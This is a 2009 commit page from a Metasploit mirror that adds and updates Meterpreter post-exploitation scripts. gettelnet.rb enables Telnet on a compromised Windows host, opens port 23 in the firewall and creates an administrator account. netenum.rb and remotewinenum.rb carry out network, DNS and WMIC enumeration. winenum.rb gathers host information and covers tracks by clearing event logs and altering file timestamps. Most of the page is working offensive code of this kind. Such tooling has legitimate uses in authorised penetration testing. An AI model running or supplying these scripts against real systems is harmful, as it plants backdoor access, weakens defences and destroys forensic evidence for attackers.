infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

New scripts and updated scripts from Carlos Perez 

git-svn-id: file:///home/svn/framework3/trunk@6202 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2009-01-30 06:18:02 +00:00
parent f927320eda
commit e6ef0ab495
4 changed files with 519 additions and 17 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

201
scripts/meterpreter/gettelnet.rb Normal file
View File

@ -0,0 +1,201 @@
#!/usr/bin/env ruby
#
#Meterpreter script for enabling Telnet Server on Windows 2003, Windows Vista
#Windows 2008 and Windows XP targets using native windows commands.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.1.1
#Note: If the Telnet Server is not installed in Vista or win2k8
# it will be installed.
################## Variable Declarations ##################
session = client
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu." ],
"-e" => [ false, "Enable Telnet Server only." ],
"-p" => [ true, "The Password of the user to add." ],
"-u" => [ true, "The Username of the user to add." ]
)
def checkifinst(session)
r = session.sys.process.execute("sc query state= all",nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
if d =~ (/TlntSvr/)
return true
end
end
r.channel.close
r.close
end
#-------------------------------------------------------------------------------
def winver(session)
stringtest = ""
verout = []
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
stringtest << d
end
r.channel.close
r.close
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
version = nil
if verout[0] == "6"
if verout[1] == "0"
version = "Windows Vista/Windows 2008"
elsif verout[1] == "1"
version = "Windpows 7"
end
elsif verout [0] == "5"
if verout[1] == "0"
version = "Windows 2000"
elsif verout[1] == "1"
version = "Windows XP"
elsif verout[1] == "2"
version = "Windows 2003"
end
end
version
end
#---------------------------------------------------------------------------------------------------------
def insttlntsrv(session)
trgtos = winver(session)
if trgtos =~ /(Windows Vista)/
if checkifinst(session)
print_status("Telnet Service Installed on Target")
else
print_status("Installing Telnet Server Service ......")
session.response_timeout=90
r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
r.channel.close
r.close
end
end
end
#---------------------------------------------------------------------------------------------------------
def enabletlntsrv(session)
tmpout = [ ]
cmdout = []
key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr"
root_key2, base_key2 = session.sys.registry.splitkey(key2)
value2 = "Start"
begin
open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
v2 = open_key.query_value(value2)
print_status "Setting Telnet Server Services service startup mode"
if v2.data != 2
print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..."
cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ]
cmmds. each do |cmd|
r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
end
else
print_status "\tTelnet Server Services service is already set to auto"
end
#Enabling Exception on the Firewall
print_status "\tOpening port in local firewall if necessary"
r = session.sys.process.execute('netsh firewall set portopening protocol = tcp port = 23 mode = enable', nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
end
#---------------------------------------------------------------------------------------------------------
def addrdpusr(session, username, password)
tmpout = [ ]
cmdout = []
print_status "Setting user account for logon"
print_status "\tAdding User: #{username} with Password: #{password}"
begin
r = session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "\tAdding User: #{username} to local group TelnetClients"
r = session.sys.process.execute("net localgroup \"TelnetClients\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "\tAdding User: #{username} to local group Administrators"
r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "You can now login with the created user"
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
end
#---------------------------------------------------------------------------------------------------------
def message
print_status "Windows Telnet Server Enabler Meterpreter Script"
end
def usage
print(
"Windows Telnet Server Enabler Meterpreter Script\n" +
"Usage: getgui -u <username> -p <password> \n" +
@@exec_opts.usage
)
end
################## MAIN ##################
# Parsing of Options
usr = nil
pass = nil
lport = nil
enbl = nil
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-u"
usr = val
when "-p"
pass = val
when "-h"
usage
break
when "-n"
lport = val.to_i
when "-e"
enbl = 1
end
}
if enbl == 1
message
insttlntsrv(session)
enabletlntsrv(session)
elsif usr!= nil && pass != nil
message
insttlntsrv(session)
enabletlntsrv(session)
addrdpusr(session, usr, pass)
else
usage
end

67
scripts/meterpreter/netenum.rb
View File

@ -4,7 +4,7 @@ require 'ftools'
#Meterpreter script for ping sweeps on Windows 2003, Windows Vista #Meterpreter script for ping sweeps on Windows 2003, Windows Vista
#Windows 2008 and Windows XP targets using native windows commands. #Windows 2008 and Windows XP targets using native windows commands.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com #Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.1.1 #Verion: 0.1.2
#Note: #Note:
################## Variable Declarations ################## ################## Variable Declarations ##################
@@exec_opts = Rex::Parser::Arguments.new( @@exec_opts = Rex::Parser::Arguments.new(
@ -15,7 +15,8 @@ require 'ftools'
"-fl" => [ false, "To Perform DNS Forward Lookup on host list and domain"], "-fl" => [ false, "To Perform DNS Forward Lookup on host list and domain"],
"-hl" => [ true, "File with Host List for DNS Forward Lookup"], "-hl" => [ true, "File with Host List for DNS Forward Lookup"],
"-d" => [ true, "Domain Name for DNS Forward Lookup"], "-d" => [ true, "Domain Name for DNS Forward Lookup"],
"-st" => [ false, "To Perform DNS lookup of MX, NS and SOA records for a domain"] "-st" => [ false, "To Perform DNS lookup of MX and NS records for a domain"],
"-sr" => [ false, "To Perform Service Record DNS lookup for a domain"]
) )
session = client session = client
@ -38,12 +39,14 @@ dest = logs + "/" + host + filenameinfo
def stdlookup(session,domain,dest) def stdlookup(session,domain,dest)
dest = dest + "-general-record-lookup.txt" dest = dest + "-general-record-lookup.txt"
print_status("Getting MX and NS Records for Domain #{domain}") print_status("Getting MX and NS Records for Domain #{domain}")
filewrt(dest,"MX and NS Records for Domain #{domain}") filewrt(dest,"SOA, NS and MX Records for Domain #{domain}")
types = ["SOA","NS","MX"]
mxout = [] mxout = []
results = [] results = []
garbage = [] garbage = []
types.each do |t|
begin begin
r = session.sys.process.execute("nslookup -query=mx #{domain}", nil, {'Hidden' => true, 'Channelized' => true}) r = session.sys.process.execute("nslookup -type=#{t} #{domain}", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read) while(d = r.channel.read)
mxout << d mxout << d
end end
@ -51,17 +54,19 @@ def stdlookup(session,domain,dest)
r.close r.close
results = mxout.to_s.split(/\n/) results = mxout.to_s.split(/\n/)
results.each do |rec| results.each do |rec|
if rec =~ /(Name:)/ or rec =~ /(Address:)/ or rec =~ /(Server:)/ if rec.match(/\s*internet\saddress\s\=\s/)
garbage << rec garbage << rec.split(/\s*internet\saddress\s\=/)
else print_status("#{garbage[0].to_s.sub(" "," ")} #{t} ")
print_status("\t#{rec}") filewrt(dest,garbage[0].to_s.sub(" "," ")+" #{t} ")
filewrt(dest,"#{rec}") garbage.clear
end end
garbage.clear
end end
rescue ::Exception => e rescue ::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}") print_status("The following Error was encountered: #{e.class} #{e}")
end end
end
end end
#------------------------------------------------------------------------------- #-------------------------------------------------------------------------------
# Function for writing results of other functions to a file # Function for writing results of other functions to a file
@ -215,6 +220,39 @@ def pingsweep(session,iprange,dest)
end end
end end
#------------------------------------------------------------------------------- #-------------------------------------------------------------------------------
#Function for enumerating srv records
def srvreclkp(session,domain,dest)
dest = dest + "-srvenum.txt"
srout = []
garbage = []
srvrcd = [
"_gc._tcp.","_kerberos._tcp.", "_kerberos._udp.","_ldap._tcp.","_test._tcp.",
"_sips._tcp.","_sip._udp.","_sip._tcp.","_aix._tcp.","_aix._tcp.","_finger._tcp.",
"_ftp._tcp.","_http._tcp.","_nntp._tcp.","_telnet._tcp.","_whois._tcp."]
print_status("Performing SRV Record Enumeration for #{domain}")
filewrt(dest,"SRV Record Enumeration for #{domain}")
srvrcd.each do |srv|
r = session.sys.process.execute("nslookup -query=srv #{srv}#{domain}", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
srout << d
end
r.channel.close
r.close
results = srout.to_s.split(/\n/)
results.each do |rec|
if rec.match(/\s*internet\saddress\s\=\s/)
garbage << rec.split(/\s*internet\saddress\s\=/)
print_status("\tfor #{srv}#{domain} #{garbage[0].to_s.sub(" "," ")}")
filewrt(dest,"for #{srv}#{domain} #{garbage[0].to_s.sub(" "," ")}")
garbage.clear
end
garbage.clear
srout.clear
end
end
end
#-------------------------------------------------------------------------------
#Function to print message during run #Function to print message during run
def message(dest) def message(dest)
print_status "Network Enumerator Meterpreter Script " print_status "Network Enumerator Meterpreter Script "
@ -231,10 +269,12 @@ frdlkp = nil
dom = nil dom = nil
hostlist = nil hostlist = nil
helpcall = nil helpcall = nil
srvrc = nil
# Parsing of Options # Parsing of Options
@@exec_opts.parse(args) { |opt, idx, val| @@exec_opts.parse(args) { |opt, idx, val|
case opt case opt
when "-sr"
srvrc = 1
when "-rl" when "-rl"
rvrslkp = 1 rvrslkp = 1
when "-fl" when "-fl"
@ -249,6 +289,7 @@ helpcall = nil
hostlist = val hostlist = val
when "-r" when "-r"
range = val range = val
when "-h" when "-h"
print( print(
"Network Enumerator Meterpreter Script\n" + "Network Enumerator Meterpreter Script\n" +
@ -270,7 +311,11 @@ elsif dom != nil && hostlist!= nil && frdlkp == 1
message(logs) message(logs)
frwdlp(session,hostlist,dom,dest) frwdlp(session,hostlist,dom,dest)
elsif dom != nil && stdlkp == 1 elsif dom != nil && stdlkp == 1
message(logs)
stdlookup(session,dom,dest) stdlookup(session,dom,dest)
elsif dom != nil && srvrc == 1
message(logs)
srvreclkp(session,dom,dest)
elsif helpcall == nil elsif helpcall == nil
print( print(
"Network Enumerator Meterpreter Script\n" + "Network Enumerator Meterpreter Script\n" +

210
scripts/meterpreter/remotewinenum.rb Normal file
View File

@ -0,0 +1,210 @@
#!/usr/bin/env ruby
#
#Meterpreter script for basic enumeration of Windows 2003, Windows Vista
# and Windows XP remote targets using native windows command wmic.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.1.1
#Note:
################## Variable Declarations ##################
session = client
# Variables for Options
helpcall = 0
rusr = nil
rpass = nil
trg = ""
# Script Options
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu."],
"-t" => [ true, "The target address"],
"-u" => [ true, "User on the target system (If not provided it will use credential of process)"],
"-p" => [ true, "Password of user on target system"]
)
# Create Filename info to be appended to downloaded files
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
# Create a directory for the logs
logs = ::File.join(Msf::Config.config_directory, 'logs', 'remotewinenum')
# Create the log directory
::FileUtils.mkdir_p(logs)
# WMIC Commands that will be executed on the Target
wmic = [
'environment list',
'share list',
'nicconfig list',
'computersystem list',
'useraccount list',
'group list',
'sysaccount list',
'volume list brief',
'service list brief',
'process list brief',
'startup list full',
'rdtoggle list',
'qfe list'
]
################## Function Declarations ##################
# Function for running a list of WMIC commands stored in a array, returs string
def wmicexec(session,wmic,user,pass,trgt)
print_status("Running WMIC Commands ....")
tmpout = ''
command = nil
runfail = 0
runningas = session.sys.config.getuid
begin
tmp = session.fs.file.expand_path("%TEMP%")
# Temporary file on windows host to store results
wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
wmic.each do |wmi|
if user == nil
print_status("The commands will be ran under the credentials of #{runningas}")
command = "/node:#{trgt} /append:#{wmicfl} #{wmi}"
else
command = "/user:#{user} /password:#{pass} /node:#{trgt} /append:#{wmicfl} #{wmi}"
end
print_status "\trunning command wimic #{wmi}"
r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
sleep(1)
r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} from #{trgt} >> #{wmicfl}",nil, {'Hidden' => 'true'})
sleep(1)
r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
sleep(1)
#print_status "\twmic #{command}"
r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true})
sleep(2)
r.close
end
# Read the output file of the wmic commands
wmioutfile = session.fs.file.new(wmicfl, "rb")
until wmioutfile.eof?
tmpout << wmioutfile.read
end
# Close output file in host
wmioutfile.close
rescue ::Exception => e
print_status("Error running WMIC commands: #{e.class} #{e}")
end
# We delete the file with the wmic command output.
c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
c.close
tmpout
end
#-------------------------------------------------------------------------------
# Function for writing results of other functions to a file
def filewrt(file2wrt, data2wrt)
output = ::File.open(file2wrt, "a")
data2wrt.each do |d|
output.puts(d)
end
output.close
end
#------------------------------------------------------------------------------
# Function to generate report header
def headerbuid(session,target,dest)
# Header for File that will hold all the output of the commands
info = session.sys.config.sysinfo
header = "Date: #{::Time.now.strftime("%Y-%m-%d.%H:%M:%S")}\n"
header << "Running as: #{client.sys.config.getuid}\n"
header << "From: #{info['Computer']}\n"
header << "OS: #{info['OS']}\n"
header << "Target: #{target}\n"
header << "\n\n\n"
print_status("Saving report to #{dest}")
header
end
#------------------------------------------------------------------------------
def winver(session)
stringtest = ""
verout = []
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
stringtest << d
end
r.channel.close
r.close
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
version = nil
if verout[0] == "6"
if verout[1] == "0"
version = "Windows Vista/Windows 2008"
elsif verout[1] == "1"
version = "Windpows 7"
end
elsif verout [0] == "5"
if verout[1] == "0"
version = "Windows 2000"
elsif verout[1] == "1"
version = "Windows XP"
elsif verout[1] == "2"
version = "Windows 2003"
end
end
version
end
#------------------------------------------------------------------------------
# Function Help Message
def helpmsg
print(
"Remote Windows Enumeration Meterpreter Script\n" +
"This script will enumerate windows hosts in the target enviroment\n" +
"given a username and password or using the credential under witch\n" +
"Meterpeter is running using WMI wmic windows native tool.\n" +
"Usage:\n" +
@@exec_opts.usage
)
end
################## MAIN ##################
localos = winver(session)
# Check that the command is not being ran on a Win2k host
# since wmic is not present in Windows 2000
if localos =~ /(Windows 2000)/
print_status("This script is not supported to be ran from Windows 2000 servers!!!")
else
# Parsing of Options
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-t"
trg = val
when "-u"
rusr = val
when "-p"
rpass = val
when "-h"
helpmsg
helpcall = 1
end
}
#logfile name
dest = logs + "/" + trg + filenameinfo
# Executing main logic of the script
if helpcall == 0 and trg != ""
# Making sure that is running as System a Username and Password for target machine must be provided
if session.sys.config.getuid == "NT AUTHORITY\\SYSTEM" && rusr == nil && rpass == nil
print_status("Stopped: Running as System and no user provided for connecting to target!!")
else trg != nil && helpcall != 1
filewrt(dest,headerbuid(session,trg,dest))
filewrt(dest,wmicexec(session,wmic,rusr,rpass,trg))
end
elsif helpcall == 0 and trg == ""
helpmsg
end
end

58
scripts/meterpreter/winenum.rb
View File

@ -3,7 +3,7 @@
#Meterpreter script for basic enumeration of Windows 2000, Windows 2003, Windows Vista #Meterpreter script for basic enumeration of Windows 2000, Windows 2003, Windows Vista
# and Windows XP targets using native windows commands. # and Windows XP targets using native windows commands.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com #Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.3.2 #Verion: 0.3.4
#Note: Compleatly re-writen to make it modular and better error handling. #Note: Compleatly re-writen to make it modular and better error handling.
# Working on adding more Virtual Machine Checks and looking at improving # Working on adding more Virtual Machine Checks and looking at improving
# the code but retain the independance of each module so it is easier for # the code but retain the independance of each module so it is easier for
@ -33,13 +33,18 @@ commands = [
'ipconfig /displaydns', 'ipconfig /displaydns',
'route print', 'route print',
'net view', 'net view',
'netstat -na', 'netstat -nao',
'netstat -vb',
'netstat -ns', 'netstat -ns',
'net accounts', 'net accounts',
'net accounts /domain',
'net session',
'net share', 'net share',
'net group', 'net group',
'net user', 'net user',
'net localgroup', 'net localgroup',
'net localgroup administrators',
'net group administrators',
'net view /domain', 'net view /domain',
'netsh firewall show config', 'netsh firewall show config',
'tasklist /svc' 'tasklist /svc'
@ -62,11 +67,12 @@ cmdstomp = [
wmic = [ wmic = [
'computersystem list', 'computersystem list',
'useraccount list', 'useraccount list',
'group', 'group list',
'service list brief', 'service list brief',
'volume list brief', 'volume list brief',
'process list brief', 'process list brief',
'startup list full', 'startup list full',
'rdtoggle list',
'qfe', 'qfe',
] ]
#Specific Commands for Windows vista for Wireless Enumeration #Specific Commands for Windows vista for Wireless Enumeration
@ -84,6 +90,12 @@ nonwin2kcmd = [
'wbem\\wmic.exe', 'wbem\\wmic.exe',
'netsh.exe', 'netsh.exe',
] ]
# Executables not pressent in Windows 2000
nowin2kexe = [
'netsh.exe',
'tasklist.exe',
'wbem\\wmic.exe',
]
################## Function Declarations ################## ################## Function Declarations ##################
# Function to check if Target Machine a VM # Function to check if Target Machine a VM
@ -357,7 +369,7 @@ end
def covertracks(session,cmdstomp) def covertracks(session,cmdstomp)
clrevtlgs(session) clrevtlgs(session)
info = session.sys.config.sysinfo info = session.sys.config.sysinfo
trgtos = info['OS'] trgtos = winver(session)
if trgtos =~ /(Windows 2000)/ if trgtos =~ /(Windows 2000)/
chmace(session,cmdstomp - nonwin2kcmd) chmace(session,cmdstomp - nonwin2kcmd)
else else
@ -488,6 +500,36 @@ def killApp(session,procpid)
session.sys.process.kill(procpid) session.sys.process.kill(procpid)
print_status("Old process #{procpid} killed.") print_status("Old process #{procpid} killed.")
end end
#-------------------------------------------------------------------------------
def winver(session)
stringtest = ""
verout = []
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
stringtest << d
end
r.channel.close
r.close
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
version = nil
if verout[0] == "6"
if verout[1] == "0"
version = "Windows Vista/Windows 2008"
elsif verout[1] == "1"
version = "Windpows 7"
end
elsif verout [0] == "5"
if verout[1] == "0"
version = "Windows 2000"
elsif verout[1] == "1"
version = "Windows XP"
elsif verout[1] == "2"
version = "Windows 2003"
end
end
version
end
#--------------------------------------------------------------------------------------------------------- #---------------------------------------------------------------------------------------------------------
# Function to execute process migration # Function to execute process migration
@ -537,7 +579,7 @@ if helpopt != 1
header << "Host: #{info['Computer']}\n" header << "Host: #{info['Computer']}\n"
header << "OS: #{info['OS']}\n" header << "OS: #{info['OS']}\n"
header << "\n\n\n" header << "\n\n\n"
trgtos = info['OS'] trgtos = winver(session)
print_status("Saving report to #{dest}") print_status("Saving report to #{dest}")
filewrt(dest,header) filewrt(dest,header)
filewrt(dest,chkvm(session)) filewrt(dest,chkvm(session))
@ -566,7 +608,11 @@ if helpopt != 1
end end
if (cm != nil) if (cm != nil)
filewrt(dest,"EventLogs where Cleared") filewrt(dest,"EventLogs where Cleared")
covertracks(session,cmdstomp) if trgtos =~ /(Windows 2000)/
covertracks(session,cmdstomp - nowin2kexe)
else
covertracks(session,cmdstomp)
end
end end
print_status("Done!") print_status("Done!")
end end